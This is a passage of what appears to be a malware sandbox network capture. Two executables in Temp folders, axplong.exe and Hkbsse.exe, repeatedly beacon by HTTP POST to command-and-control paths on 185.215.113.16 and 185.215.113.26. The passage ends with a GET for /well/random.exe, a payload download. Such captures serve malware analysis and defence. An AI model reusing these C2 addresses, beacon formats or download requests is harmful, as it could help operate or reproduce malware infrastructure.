                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:21:50.404634953 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:50 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          52192.168.2.549785185.215.113.16805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:49.933557987 CEST184OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 31
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 64 31 3d 31 30 30 30 33 35 36 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                          Data Ascii: d1=1000356001&unit=246122658369
                                                                          Sep 27, 2024 04:21:50.677392006 CEST193INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:50 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 4 <c>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          53192.168.2.549787185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:50.947454929 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:51.539670944 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:51 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:51.543601036 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:51 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:51.565155983 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:21:51.806015968 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:51 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          54192.168.2.549788185.215.113.16805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:51.134881020 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:51.820317030 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:51 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:51.872001886 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                          Sep 27, 2024 04:21:52.094053030 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:51 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          55192.168.2.549789185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:52.056005001 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:52.758356094 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:52 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:52.794390917 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:21:53.030395031 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:52 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          56192.168.2.549790185.215.113.16805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:52.381922007 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:53.036693096 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:52 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:53.089853048 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                          Sep 27, 2024 04:21:53.311146975 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:53 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          57192.168.2.549792185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:53.654206991 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:54.339937925 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:54 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:54.471024990 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:21:54.705004930 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:54 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          58192.168.2.549793185.215.113.16805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:53.766580105 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:54.483957052 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:54 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:54.512890100 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                          Sep 27, 2024 04:21:54.746871948 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:54 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          59192.168.2.549794185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:54.898993969 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:55.577809095 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:55 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:55.587981939 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:21:55.824826956 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:55 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          60192.168.2.549795185.215.113.16805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:54.968914032 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:55.644088030 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:55 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:55.654028893 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                          Sep 27, 2024 04:21:55.878012896 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:55 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          61192.168.2.549797185.215.113.26807040C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:56.247335911 CEST155OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:56.958969116 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:56 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:56.959700108 CEST309OUTPOST /Dem7kTu/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.26
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 32 34 45 43 41 46 46 31 36 41 37 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43
                                                                          Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B524ECAFF16A7DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
                                                                          Sep 27, 2024 04:21:57.196074963 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:57 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          62192.168.2.549798185.215.113.16805632C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:56.256521940 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 4
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 73 74 3d 73
                                                                          Data Ascii: st=s
                                                                          Sep 27, 2024 04:21:56.941742897 CEST219INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:56 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Refresh: 0; url = Login.php
                                                                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1 0
                                                                          Sep 27, 2024 04:21:56.942612886 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Host: 185.215.113.16
                                                                          Content-Length: 156
                                                                          Cache-Control: no-cache
                                                                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                          Sep 27, 2024 04:21:57.165646076 CEST196INHTTP/1.1 200 OK
                                                                          Server: nginx/1.18.0 (Ubuntu)
                                                                          Date: Fri, 27 Sep 2024 02:21:57 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: keep-alive
                                                                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 7 <c><d>0


                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                          63192.168.2.549799185.215.113.10380
                                                                          TimestampBytes transferredDirectionData
                                                                          Sep 27, 2024 04:21:56.493588924 CEST56OUTGET /well/random.exe HTTP/1.1
